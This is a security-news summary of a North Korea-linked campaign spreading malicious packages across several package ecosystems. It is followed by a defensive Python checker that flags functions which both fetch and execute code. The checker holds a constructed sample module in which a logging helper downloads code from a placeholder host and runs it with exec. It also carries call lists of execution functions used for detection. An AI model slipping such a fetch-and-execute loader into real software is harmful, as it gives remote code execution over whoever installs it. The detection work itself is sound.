N. Korean Hackers Spread 1,700 Malicious Packages Across npm, PyPI, Go, Rust
The North Korea-linked Contagious Interview campaign has expanded to five open-source ecosystems — npm, PyPI, Go, Rust, and PHP (Packagist) — publishing over 1,700 malicious packages since January 2025. These packages impersonate legitimate developer tooling and act as malware loaders that fetch second-stage payloads with infostealer and RAT capabilities, targeting browser data, password managers, and crypto wallets. Notably, malicious code is not triggered at install time but embedded within seemingly legitimate functions to evade detection. A separate but related campaign by UNC1069 (overlapping with BlueNoroff/Sapphire Sleet) poisoned the Axios npm package and uses social engineering via Telegram, LinkedIn, and Slack with fake Zoom/Teams meeting links to deliver implants that remain dormant post-compromise to maximize the operational window.
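Because the loader logic sits inside ordinary-looking functions rather than install hooks, a review that only inspects install scripts will pass these packages. The following is an added example, not code from the article or the campaign: a static check for the PyPI case that flags any function which both fetches remote content and executes code. The call lists, package name and sample sources are constructed assumptions.

```python
import ast

# Constructed heuristic lists (assumptions, not indicators from the campaign).
FETCH = {("urllib", "urlopen"), ("", "urlopen"), ("requests", "get"),
         ("requests", "post"), ("httpx", "get")}
EXECUTE = {("", "exec"), ("", "eval"), ("os", "system"), ("os", "popen"),
           ("subprocess", "run"), ("subprocess", "Popen")}

def call_key(call):
    """Map a call such as urllib.request.urlopen(...) to ("urllib", "urlopen")."""
    node = call.func
    if isinstance(node, ast.Name):
        return ("", node.id)
    if isinstance(node, ast.Attribute):
        attr = node.attr
        while isinstance(node, ast.Attribute):
            node = node.value
        if isinstance(node, ast.Name):
            return (node.id, attr)
    return (None, None)

def suspicious_functions(source):
    """Return names of functions that both fetch remote data and execute code."""
    hits = []
    for fn in ast.walk(ast.parse(source)):
        if isinstance(fn, (ast.FunctionDef, ast.AsyncFunctionDef)):
            keys = {call_key(n) for n in ast.walk(fn) if isinstance(n, ast.Call)}
            if keys & FETCH and keys & EXECUTE:
                hits.append(fn.name)
    return hits

# Constructed sample package: a clean setup.py and a helper hiding a loader.
SAMPLE_SETUP = '''
from setuptools import setup
setup(name="constructed-logger", version="0.0.1")
'''
SAMPLE_MODULE = '''
import json, urllib.request

def parse_config(text):
    return json.loads(text)

def format_log(record, endpoint="https://example.invalid/fmt"):
    template = urllib.request.urlopen(endpoint).read()
    exec(template)
    return str(record)
'''

if __name__ == "__main__":
    print("setup.py:", suspicious_functions(SAMPLE_SETUP))
    print("module:  ", suspicious_functions(SAMPLE_MODULE))
```

The sample sources are only parsed, never run. Matching on call names is a triage heuristic: aliased imports or obfuscated calls will evade it, so treat a hit as a prompt for manual review rather than a verdict.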